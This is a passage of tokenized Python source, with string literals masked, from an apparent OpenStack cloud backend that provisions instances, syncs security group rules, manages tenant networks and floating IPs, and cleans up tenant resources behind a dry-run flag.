internal_ips = ips . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> external_ips = ips . 
get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> security_groups = [ sg [ '<STR_LIT:name>' ] for sg in instance . security_groups ] , <EOL> ) <EOL> except ( glance_exceptions . ClientException , <EOL> cinder_exceptions . ClientException , <EOL> nova_exceptions . ClientException , <EOL> neutron_exceptions . NeutronClientException ) as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> return instance <EOL> def get_resources_for_import ( self ) : <EOL> cur_instances = models . Instance . objects . all ( ) . values_list ( '<STR_LIT>' , flat = True ) <EOL> try : <EOL> instances = self . nova_client . servers . list ( ) <EOL> except nova_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> return [ { <EOL> '<STR_LIT:id>' : instance . id , <EOL> '<STR_LIT:name>' : instance . name or instance . id , <EOL> '<STR_LIT>' : instance . created , <EOL> '<STR_LIT:status>' : instance . status , <EOL> } for instance in instances <EOL> if instance . id not in cur_instances and <EOL> self . _get_instance_state ( instance ) != models . Instance . States . ERRED ] <EOL> def get_managed_resources ( self ) : <EOL> try : <EOL> ids = [ instance . id for instance in self . nova_client . servers . list ( ) ] <EOL> return models . Instance . objects . filter ( backend_id__in = ids ) <EOL> except nova_exceptions . ClientException : <EOL> return [ ] <EOL> def provision_instance ( self , instance , backend_flavor_id = None , backend_image_id = None , <EOL> system_volume_id = None , data_volume_id = None , <EOL> skip_external_ip_assignment = False , public_key = None ) : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> nova = self . nova_client <EOL> cinder = self . cinder_client <EOL> neutron = self . neutron_client <EOL> backend_flavor = nova . flavors . get ( backend_flavor_id ) <EOL> service_project_link = instance . service_project_link <EOL> tenant = service_project_link . tenant <EOL> try : <EOL> neutron . 
show_network ( service_project_link . internal_network_id ) <EOL> except neutron_exceptions . NeutronClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> service_project_link . internal_network_id ) <EOL> raise OpenStackBackendError ( '<STR_LIT>' ) <EOL> if not skip_external_ip_assignment : <EOL> if not service_project_link . floating_ips . filter ( status = '<STR_LIT>' ) . exists ( ) : <EOL> self . allocate_floating_ip_address ( tenant ) <EOL> floating_ip = service_project_link . floating_ips . filter ( status = '<STR_LIT>' ) . first ( ) <EOL> instance . external_ips = floating_ip . address <EOL> floating_ip . status = '<STR_LIT>' <EOL> floating_ip . save ( update_fields = [ '<STR_LIT:status>' ] ) <EOL> if instance . key_name : <EOL> backend_public_key = self . get_or_create_ssh_key_for_tenant ( <EOL> tenant , instance . key_name , instance . key_fingerprint , public_key ) <EOL> else : <EOL> backend_public_key = None <EOL> if not system_volume_id : <EOL> system_volume_name = '<STR_LIT>' . format ( instance . name ) <EOL> logger . info ( '<STR_LIT>' , system_volume_name , instance . uuid ) <EOL> system_volume = cinder . volumes . create ( <EOL> size = self . mb2gb ( instance . system_volume_size ) , <EOL> display_name = system_volume_name , <EOL> display_description = '<STR_LIT>' , <EOL> imageRef = backend_image_id ) <EOL> system_volume_id = system_volume . id <EOL> if not data_volume_id : <EOL> data_volume_name = '<STR_LIT>' . format ( instance . name ) <EOL> logger . info ( '<STR_LIT>' , data_volume_name , instance . uuid ) <EOL> data_volume = cinder . volumes . create ( <EOL> size = self . mb2gb ( instance . data_volume_size ) , <EOL> display_name = data_volume_name , <EOL> display_description = '<STR_LIT>' ) <EOL> data_volume_id = data_volume . id <EOL> if not self . _wait_for_volume_status ( system_volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> instance . 
uuid , system_volume_id ) <EOL> raise OpenStackBackendError ( "<STR_LIT>" % instance . uuid ) <EOL> if not self . _wait_for_volume_status ( data_volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> instance . uuid , data_volume_id ) <EOL> raise OpenStackBackendError ( "<STR_LIT>" % instance . uuid ) <EOL> security_group_ids = instance . security_groups . values_list ( '<STR_LIT>' , flat = True ) <EOL> server_create_parameters = dict ( <EOL> name = instance . name , <EOL> image = None , <EOL> flavor = backend_flavor , <EOL> block_device_mapping_v2 = [ <EOL> { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : system_volume_id , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : data_volume_id , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> ] , <EOL> nics = [ <EOL> { '<STR_LIT>' : service_project_link . internal_network_id } <EOL> ] , <EOL> key_name = backend_public_key . name if backend_public_key is not None else None , <EOL> security_groups = security_group_ids , <EOL> ) <EOL> availability_zone = service_project_link . availability_zone <EOL> if availability_zone : <EOL> server_create_parameters [ '<STR_LIT>' ] = availability_zone <EOL> if instance . user_data : <EOL> server_create_parameters [ '<STR_LIT>' ] = instance . user_data <EOL> server = nova . servers . create ( ** server_create_parameters ) <EOL> instance . backend_id = server . id <EOL> instance . system_volume_id = system_volume_id <EOL> instance . data_volume_id = data_volume_id <EOL> instance . save ( ) <EOL> if not self . _wait_for_instance_status ( server . id , nova , '<STR_LIT>' ) : <EOL> logger . error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> instance . 
uuid ) <EOL> raise OpenStackBackendError ( "<STR_LIT>" % instance . uuid ) <EOL> logger . debug ( "<STR_LIT>" , instance . uuid ) <EOL> try : <EOL> server = nova . servers . get ( server . id ) <EOL> fixed_address = server . addresses . values ( ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> except ( nova_exceptions . ClientException , KeyError , IndexError ) : <EOL> logger . exception ( <EOL> "<STR_LIT>" , instance . uuid ) <EOL> else : <EOL> instance . internal_ips = fixed_address <EOL> instance . save ( ) <EOL> logger . info ( <EOL> "<STR_LIT>" , instance . uuid ) <EOL> self . push_floating_ip_to_instance ( instance , server ) <EOL> backend_security_groups = server . list_security_group ( ) <EOL> for bsg in backend_security_groups : <EOL> if instance . security_groups . filter ( security_group__name = bsg . name ) . exists ( ) : <EOL> continue <EOL> try : <EOL> security_group = service_project_link . security_groups . get ( name = bsg . name ) <EOL> except models . SecurityGroup . DoesNotExist : <EOL> logger . error ( <EOL> '<STR_LIT>' % <EOL> ( service_project_link , service_project_link . pk , bsg . name , instance , instance . pk ) <EOL> ) <EOL> else : <EOL> instance . security_groups . create ( security_group = security_group ) <EOL> except ( glance_exceptions . ClientException , <EOL> cinder_exceptions . ClientException , <EOL> nova_exceptions . ClientException , <EOL> neutron_exceptions . NeutronClientException ) as e : <EOL> logger . exception ( "<STR_LIT>" , instance . uuid ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( "<STR_LIT>" , instance . uuid ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def pull_tenant_instances ( self , tenant ) : <EOL> spl = tenant . service_project_link <EOL> States = models . Instance . States <EOL> for instance in spl . instances . filter ( state__in = [ States . ONLINE , States . OFFLINE ] ) : <EOL> try : <EOL> instance_data = self . get_instance ( instance . 
backend_id ) . nc_model_data <EOL> except OpenStackBackendError as e : <EOL> logger . error ( '<STR_LIT>' , instance , instance . pk , e ) <EOL> else : <EOL> instance . ram = instance_data [ '<STR_LIT>' ] <EOL> instance . cores = instance_data [ '<STR_LIT>' ] <EOL> instance . disk = instance_data [ '<STR_LIT>' ] <EOL> instance . system_volume_size = instance_data [ '<STR_LIT>' ] <EOL> instance . data_volume_size = instance_data [ '<STR_LIT>' ] <EOL> instance . save ( ) <EOL> logger . info ( '<STR_LIT>' , instance , instance . pk ) <EOL> def cleanup ( self , dryrun = True ) : <EOL> if not self . tenant_id : <EOL> logger . info ( "<STR_LIT>" % self ) <EOL> return <EOL> neutron = self . neutron_admin_client <EOL> floatingips = neutron . list_floatingips ( tenant_id = self . tenant_id ) <EOL> if floatingips : <EOL> for floatingip in floatingips [ '<STR_LIT>' ] : <EOL> logger . info ( "<STR_LIT>" , floatingip [ '<STR_LIT:id>' ] , self . tenant_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . delete_floatingip ( floatingip [ '<STR_LIT:id>' ] ) <EOL> except neutron_exceptions . NotFound : <EOL> logger . debug ( "<STR_LIT>" , floatingip [ '<STR_LIT:id>' ] , self . tenant_id ) <EOL> ports = neutron . list_ports ( tenant_id = self . tenant_id ) <EOL> if ports : <EOL> for port in ports [ '<STR_LIT>' ] : <EOL> logger . info ( "<STR_LIT>" , port [ '<STR_LIT:id>' ] , self . tenant_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . remove_interface_router ( port [ '<STR_LIT>' ] , { '<STR_LIT>' : port [ '<STR_LIT:id>' ] } ) <EOL> except neutron_exceptions . NotFound : <EOL> logger . debug ( "<STR_LIT>" , port [ '<STR_LIT:id>' ] , self . tenant_id ) <EOL> routers = neutron . list_routers ( tenant_id = self . tenant_id ) <EOL> if routers : <EOL> for router in routers [ '<STR_LIT>' ] : <EOL> logger . info ( "<STR_LIT>" , router [ '<STR_LIT:id>' ] , self . tenant_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . 
delete_router ( router [ '<STR_LIT:id>' ] ) <EOL> except neutron_exceptions . NotFound : <EOL> logger . debug ( "<STR_LIT>" , router [ '<STR_LIT:id>' ] , self . tenant_id ) <EOL> networks = neutron . list_networks ( tenant_id = self . tenant_id ) <EOL> if networks : <EOL> for network in networks [ '<STR_LIT>' ] : <EOL> for subnet in network [ '<STR_LIT>' ] : <EOL> logger . info ( "<STR_LIT>" , subnet , self . tenant_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . delete_subnet ( subnet ) <EOL> except neutron_exceptions . NotFound : <EOL> logger . info ( "<STR_LIT>" , subnet , self . tenant_id ) <EOL> logger . info ( "<STR_LIT>" , network [ '<STR_LIT:id>' ] , self . tenant_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . delete_network ( network [ '<STR_LIT:id>' ] ) <EOL> except neutron_exceptions . NotFound : <EOL> logger . debug ( "<STR_LIT>" , network [ '<STR_LIT:id>' ] , self . tenant_id ) <EOL> nova = self . nova_client <EOL> sgroups = nova . security_groups . list ( ) <EOL> for sgroup in sgroups : <EOL> logger . info ( "<STR_LIT>" , sgroup . id , self . tenant_id ) <EOL> if not dryrun : <EOL> sgroup . delete ( ) <EOL> servers = nova . servers . list ( ) <EOL> for server in servers : <EOL> logger . info ( "<STR_LIT>" , server . id , self . tenant_id ) <EOL> if not dryrun : <EOL> server . delete ( ) <EOL> cinder = self . cinder_client <EOL> snapshots = cinder . volume_snapshots . list ( ) <EOL> for snapshot in snapshots : <EOL> logger . info ( "<STR_LIT>" , snapshot . id , self . tenant_id ) <EOL> if not dryrun : <EOL> snapshot . delete ( ) <EOL> volumes = cinder . volumes . list ( ) <EOL> for volume in volumes : <EOL> logger . info ( "<STR_LIT>" , volume . id , self . tenant_id ) <EOL> if not dryrun : <EOL> volume . delete ( ) <EOL> keystone = self . keystone_admin_client <EOL> logger . info ( "<STR_LIT>" , self . tenant_id ) <EOL> if not dryrun : <EOL> keystone . tenants . delete ( self . 
tenant_id ) <EOL> @ log_backend_action ( ) <EOL> def cleanup_tenant ( self , tenant , dryrun = True ) : <EOL> if not tenant . backend_id : <EOL> raise OpenStackBackendError ( '<STR_LIT>' ) <EOL> neutron = self . neutron_admin_client <EOL> floatingips = neutron . list_floatingips ( tenant_id = tenant . backend_id ) <EOL> if floatingips : <EOL> for floatingip in floatingips [ '<STR_LIT>' ] : <EOL> logger . info ( "<STR_LIT>" , floatingip [ '<STR_LIT:id>' ] , tenant . backend_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . delete_floatingip ( floatingip [ '<STR_LIT:id>' ] ) <EOL> except ( neutron_exceptions . NotFound , keystone_exceptions . ClientException ) : <EOL> logger . debug ( "<STR_LIT>" , floatingip [ '<STR_LIT:id>' ] , tenant . backend_id ) <EOL> ports = neutron . list_ports ( tenant_id = tenant . backend_id ) <EOL> if ports : <EOL> for port in ports [ '<STR_LIT>' ] : <EOL> logger . info ( "<STR_LIT>" , port [ '<STR_LIT:id>' ] , tenant . backend_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . remove_interface_router ( port [ '<STR_LIT>' ] , { '<STR_LIT>' : port [ '<STR_LIT:id>' ] } ) <EOL> except ( neutron_exceptions . NotFound , keystone_exceptions . ClientException ) : <EOL> logger . debug ( "<STR_LIT>" , port [ '<STR_LIT:id>' ] , tenant . backend_id ) <EOL> routers = neutron . list_routers ( tenant_id = tenant . backend_id ) <EOL> if routers : <EOL> for router in routers [ '<STR_LIT>' ] : <EOL> logger . info ( "<STR_LIT>" , router [ '<STR_LIT:id>' ] , tenant . backend_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . delete_router ( router [ '<STR_LIT:id>' ] ) <EOL> except ( neutron_exceptions . NotFound , keystone_exceptions . ClientException ) : <EOL> logger . debug ( "<STR_LIT>" , router [ '<STR_LIT:id>' ] , tenant . backend_id ) <EOL> networks = neutron . list_networks ( tenant_id = tenant . backend_id ) <EOL> if networks : <EOL> for network in networks [ '<STR_LIT>' ] : <EOL> for subnet in network [ '<STR_LIT>' ] : <EOL> logger . 
info ( "<STR_LIT>" , subnet , tenant . backend_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . delete_subnet ( subnet ) <EOL> except ( neutron_exceptions . NotFound , keystone_exceptions . ClientException ) : <EOL> logger . info ( "<STR_LIT>" , subnet , tenant . backend_id ) <EOL> logger . info ( "<STR_LIT>" , network [ '<STR_LIT:id>' ] , tenant . backend_id ) <EOL> if not dryrun : <EOL> try : <EOL> neutron . delete_network ( network [ '<STR_LIT:id>' ] ) <EOL> except ( neutron_exceptions . NotFound , keystone_exceptions . ClientException ) : <EOL> logger . debug ( "<STR_LIT>" , network [ '<STR_LIT:id>' ] , tenant . backend_id ) <EOL> nova = self . nova_client <EOL> sgroups = nova . security_groups . list ( ) <EOL> for sgroup in sgroups : <EOL> logger . info ( "<STR_LIT>" , sgroup . id , tenant . backend_id ) <EOL> if not dryrun : <EOL> try : <EOL> sgroup . delete ( ) <EOL> except ( nova_exceptions . ClientException , keystone_exceptions . ClientException ) : <EOL> logger . debug ( "<STR_LIT>" , sgroup , tenant . backend_id ) <EOL> servers = nova . servers . list ( ) <EOL> for server in servers : <EOL> logger . info ( "<STR_LIT>" , server . id , tenant . backend_id ) <EOL> if not dryrun : <EOL> server . delete ( ) <EOL> cinder = self . cinder_client <EOL> snapshots = cinder . volume_snapshots . list ( ) <EOL> for snapshot in snapshots : <EOL> logger . info ( "<STR_LIT>" , snapshot . id , tenant . backend_id ) <EOL> if not dryrun : <EOL> snapshot . delete ( ) <EOL> volumes = cinder . volumes . list ( ) <EOL> for volume in volumes : <EOL> logger . info ( "<STR_LIT>" , volume . id , tenant . backend_id ) <EOL> if not dryrun : <EOL> volume . delete ( ) <EOL> keystone = self . keystone_client <EOL> try : <EOL> user = keystone . users . find ( name = tenant . user_username ) <EOL> logger . info ( '<STR_LIT>' , user . name , tenant . backend_id ) <EOL> if not dryrun : <EOL> user . delete ( ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . 
error ( '<STR_LIT>' , tenant . user_username , tenant . backend_id , e ) <EOL> keystone = self . keystone_admin_client <EOL> logger . info ( "<STR_LIT>" , tenant . backend_id ) <EOL> if not dryrun : <EOL> try : <EOL> keystone . tenants . delete ( tenant . backend_id ) <EOL> except keystone_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> def cleanup_instance ( self , backend_id = None , external_ips = None , internal_ips = None , <EOL> system_volume_id = None , data_volume_id = None ) : <EOL> nova = self . nova_client <EOL> nova . servers . delete ( backend_id ) <EOL> cinder = self . cinder_client <EOL> cinder . volumes . delete ( system_volume_id ) <EOL> cinder . volumes . delete ( data_volume_id ) <EOL> def extend_disk ( self , instance ) : <EOL> nova = self . nova_client <EOL> cinder = self . cinder_client <EOL> logger . debug ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> volume = cinder . volumes . get ( instance . data_volume_id ) <EOL> server_id = instance . backend_id <EOL> volume_id = volume . id <EOL> new_core_size = instance . data_volume_size <EOL> old_core_size = self . gb2mb ( volume . size ) <EOL> new_backend_size = self . mb2gb ( new_core_size ) <EOL> new_core_size_gib = int ( round ( new_core_size / <NUM_LIT> ) ) <EOL> if old_core_size == new_core_size : <EOL> logger . info ( '<STR_LIT>' , <EOL> volume_id , new_core_size ) <EOL> return <EOL> elif old_core_size > new_core_size : <EOL> logger . warning ( '<STR_LIT>' , <EOL> volume_id , new_core_size , old_core_size ) <EOL> event_logger . openstack_volume . error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } <EOL> ) <EOL> return <EOL> nova . volumes . delete_server_volume ( server_id , volume_id ) <EOL> if not self . _wait_for_volume_status ( volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> volume_id , instance . 
uuid , <EOL> ) <EOL> raise OpenStackBackendError ( <EOL> '<STR_LIT>' % ( volume_id , instance . uuid ) ) <EOL> try : <EOL> self . _extend_volume ( cinder , volume , new_backend_size ) <EOL> storage_delta = new_core_size - old_core_size <EOL> instance . service_project_link . add_quota_usage ( '<STR_LIT>' , storage_delta ) <EOL> except cinder_exceptions . OverLimit as e : <EOL> logger . warning ( <EOL> '<STR_LIT>' , <EOL> volume . id , <EOL> ) <EOL> event_logger . openstack_volume . error ( <EOL> "<STR_LIT>" , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } , <EOL> ) <EOL> instance . data_volume_size = old_core_size <EOL> instance . save ( ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> finally : <EOL> nova . volumes . create_server_volume ( server_id , volume_id , None ) <EOL> if not self . _wait_for_volume_status ( volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> volume_id , instance . uuid , <EOL> ) <EOL> raise OpenStackBackendError ( <EOL> '<STR_LIT>' % ( volume_id , instance . uuid ) ) <EOL> except cinder_exceptions . OverLimit : <EOL> pass <EOL> except ( nova_exceptions . ClientException , cinder_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . openstack_volume . info ( <EOL> "<STR_LIT>" , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance , '<STR_LIT>' : new_core_size_gib } , <EOL> ) <EOL> def _push_security_group_rules ( self , security_group ) : <EOL> """<STR_LIT>""" <EOL> nova = self . nova_client <EOL> backend_security_group = nova . security_groups . get ( group_id = security_group . backend_id ) <EOL> backend_rules = { <EOL> rule [ '<STR_LIT:id>' ] : self . _normalize_security_group_rule ( rule ) <EOL> for rule in backend_security_group . 
rules <EOL> } <EOL> nonexistent_rules = [ ] <EOL> unsynchronized_rules = [ ] <EOL> extra_rule_ids = backend_rules . keys ( ) <EOL> for nc_rule in security_group . rules . all ( ) : <EOL> if nc_rule . backend_id not in backend_rules : <EOL> nonexistent_rules . append ( nc_rule ) <EOL> else : <EOL> backend_rule = backend_rules [ nc_rule . backend_id ] <EOL> if not self . _are_rules_equal ( backend_rule , nc_rule ) : <EOL> unsynchronized_rules . append ( nc_rule ) <EOL> extra_rule_ids . remove ( nc_rule . backend_id ) <EOL> for backend_rule_id in extra_rule_ids : <EOL> logger . debug ( '<STR_LIT>' , backend_rule_id ) <EOL> try : <EOL> nova . security_group_rules . delete ( backend_rule_id ) <EOL> except nova_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> backend_rule_id , security_group ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , backend_rule_id ) <EOL> for nc_rule in unsynchronized_rules : <EOL> logger . debug ( '<STR_LIT>' , nc_rule . backend_id ) <EOL> try : <EOL> nova . security_group_rules . delete ( nc_rule . backend_id ) <EOL> except nova_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> nc_rule . backend_id , security_group ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , <EOL> nc_rule . backend_id ) <EOL> for nc_rule in unsynchronized_rules + nonexistent_rules : <EOL> logger . debug ( '<STR_LIT>' , nc_rule . id ) <EOL> try : <EOL> if nc_rule . protocol == '<STR_LIT>' : <EOL> nc_rule_protocol = None <EOL> else : <EOL> nc_rule_protocol = nc_rule . protocol <EOL> nova . security_group_rules . create ( <EOL> parent_group_id = security_group . backend_id , <EOL> ip_protocol = nc_rule_protocol , <EOL> from_port = nc_rule . from_port , <EOL> to_port = nc_rule . to_port , <EOL> cidr = nc_rule . cidr , <EOL> ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , <EOL> nc_rule , security_group ) <EOL> six . 
reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , nc_rule . id ) <EOL> @ log_backend_action ( ) <EOL> def create_security_group ( self , security_group ) : <EOL> nova = self . nova_client <EOL> try : <EOL> backend_security_group = nova . security_groups . create ( name = security_group . name , description = '<STR_LIT>' ) <EOL> security_group . backend_id = backend_security_group . id <EOL> security_group . save ( ) <EOL> self . _push_security_group_rules ( security_group ) <EOL> except nova_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ log_backend_action ( ) <EOL> def delete_security_group ( self , security_group ) : <EOL> nova = self . nova_client <EOL> try : <EOL> nova . security_groups . delete ( security_group . backend_id ) <EOL> except nova_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ log_backend_action ( ) <EOL> def update_security_group ( self , security_group ) : <EOL> nova = self . nova_client <EOL> try : <EOL> backend_security_group = nova . security_groups . find ( id = security_group . backend_id ) <EOL> if backend_security_group . name != security_group . name : <EOL> nova . security_groups . update ( <EOL> backend_security_group , name = security_group . name , description = '<STR_LIT>' ) <EOL> self . _push_security_group_rules ( security_group ) <EOL> except nova_exceptions . ClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def create_external_network ( self , tenant , neutron , network_ip , network_prefix , <EOL> vlan_id = None , vxlan_id = None , ips_count = None ) : <EOL> service_project_link = tenant . service_project_link <EOL> if tenant . external_network_id : <EOL> self . connect_tenant_to_external_network ( tenant , tenant . external_network_id ) <EOL> neutron = self . neutron_admin_client <EOL> network_name = '<STR_LIT>' . 
format ( uuid . uuid4 ( ) . hex ) <EOL> network = { <EOL> '<STR_LIT:name>' : network_name , <EOL> '<STR_LIT>' : service_project_link . tenant_id , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> if vlan_id : <EOL> network [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> network [ '<STR_LIT>' ] = vlan_id <EOL> elif vxlan_id : <EOL> network [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> network [ '<STR_LIT>' ] = vxlan_id <EOL> else : <EOL> raise OpenStackBackendError ( '<STR_LIT>' ) <EOL> create_response = neutron . create_network ( { '<STR_LIT>' : [ network ] } ) <EOL> network_id = create_response [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] <EOL> logger . info ( '<STR_LIT>' , network_name ) <EOL> tenant . external_network_id = network_id <EOL> tenant . save ( update_fields = [ '<STR_LIT>' ] ) <EOL> subnet_name = '<STR_LIT>' . format ( network_name ) <EOL> cidr = '<STR_LIT>' . format ( network_ip , network_prefix ) <EOL> subnet_data = { <EOL> '<STR_LIT>' : service_project_link . external_network_id , <EOL> '<STR_LIT>' : service_project_link . tenant_id , <EOL> '<STR_LIT>' : cidr , <EOL> '<STR_LIT:name>' : subnet_name , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> create_response = neutron . create_subnet ( { '<STR_LIT>' : [ subnet_data ] } ) <EOL> logger . info ( '<STR_LIT>' , subnet_name ) <EOL> self . get_or_create_router ( network_name , create_response [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] ) <EOL> floating_ip = { <EOL> '<STR_LIT>' : service_project_link . external_network_id , <EOL> } <EOL> if vlan_id is not None and ips_count is not None : <EOL> for i in range ( ips_count ) : <EOL> ip = neutron . create_floatingip ( { '<STR_LIT>' : floating_ip } ) [ '<STR_LIT>' ] <EOL> logger . info ( '<STR_LIT>' , <EOL> ip [ '<STR_LIT>' ] , network_name ) <EOL> return service_project_link . external_network_id <EOL> def detect_external_network ( self , tenant ) : <EOL> neutron = self . 
neutron_admin_client <EOL> routers = neutron . list_routers ( tenant_id = tenant . backend_id ) [ '<STR_LIT>' ] <EOL> if bool ( routers ) : <EOL> router = routers [ <NUM_LIT:0> ] <EOL> else : <EOL> logger . warning ( '<STR_LIT>' , tenant , tenant . pk ) <EOL> return <EOL> ext_gw = router . get ( '<STR_LIT>' , { } ) <EOL> if '<STR_LIT>' in ext_gw : <EOL> tenant . external_network_id = ext_gw [ '<STR_LIT>' ] <EOL> tenant . save ( ) <EOL> logger . info ( '<STR_LIT>' , <EOL> ext_gw [ '<STR_LIT>' ] , tenant , tenant . pk ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def delete_external_network ( self , tenant ) : <EOL> neutron = self . neutron_admin_client <EOL> try : <EOL> floating_ips = neutron . list_floatingips ( <EOL> floating_network_id = tenant . external_network_id ) [ '<STR_LIT>' ] <EOL> for ip in floating_ips : <EOL> neutron . delete_floatingip ( ip [ '<STR_LIT:id>' ] ) <EOL> logger . info ( '<STR_LIT>' , ip [ '<STR_LIT:id>' ] ) <EOL> ports = neutron . list_ports ( network_id = tenant . external_network_id ) [ '<STR_LIT>' ] <EOL> for port in ports : <EOL> neutron . remove_interface_router ( port [ '<STR_LIT>' ] , { '<STR_LIT>' : port [ '<STR_LIT:id>' ] } ) <EOL> logger . info ( '<STR_LIT>' , port [ '<STR_LIT:id>' ] ) <EOL> subnets = neutron . list_subnets ( network_id = tenant . external_network_id ) [ '<STR_LIT>' ] <EOL> for subnet in subnets : <EOL> neutron . delete_subnet ( subnet [ '<STR_LIT:id>' ] ) <EOL> logger . info ( '<STR_LIT>' , subnet [ '<STR_LIT:id>' ] ) <EOL> neutron . delete_network ( tenant . external_network_id ) <EOL> logger . info ( '<STR_LIT>' , tenant . external_network_id ) <EOL> except ( neutron_exceptions . NeutronClientException , <EOL> keystone_exceptions . ClientException ) as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> tenant . external_network_id = '<STR_LIT>' <EOL> tenant . 
save ( ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def create_internal_network ( self , tenant ) : <EOL> neutron = self . neutron_admin_client <EOL> network_name = '<STR_LIT>' . format ( tenant . name ) <EOL> try : <EOL> network = { <EOL> '<STR_LIT:name>' : network_name , <EOL> '<STR_LIT>' : self . tenant_id , <EOL> } <EOL> create_response = neutron . create_network ( { '<STR_LIT>' : [ network ] } ) <EOL> internal_network_id = create_response [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] <EOL> subnet_name = '<STR_LIT>' . format ( network_name ) <EOL> logger . info ( '<STR_LIT>' , subnet_name , tenant . name , tenant . pk ) <EOL> subnet_data = { <EOL> '<STR_LIT>' : internal_network_id , <EOL> '<STR_LIT>' : tenant . backend_id , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:start>' : '<STR_LIT>' , <EOL> '<STR_LIT:end>' : '<STR_LIT>' <EOL> } <EOL> ] , <EOL> '<STR_LIT:name>' : subnet_name , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> create_response = neutron . create_subnet ( { '<STR_LIT>' : [ subnet_data ] } ) <EOL> self . get_or_create_router ( network_name , create_response [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] ) <EOL> except ( keystone_exceptions . ClientException , neutron_exceptions . NeutronException ) as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> tenant . internal_network_id = internal_network_id <EOL> tenant . save ( update_fields = [ '<STR_LIT>' ] ) <EOL> @ log_backend_action ( '<STR_LIT>' ) <EOL> def allocate_floating_ip_address ( self , tenant ) : <EOL> neutron = self . neutron_admin_client <EOL> try : <EOL> ip_address = neutron . create_floatingip ( { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : tenant . external_network_id , <EOL> '<STR_LIT>' : tenant . backend_id , <EOL> } <EOL> } ) [ '<STR_LIT>' ] <EOL> except neutron_exceptions . NeutronClientException as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> else : <EOL> tenant . 
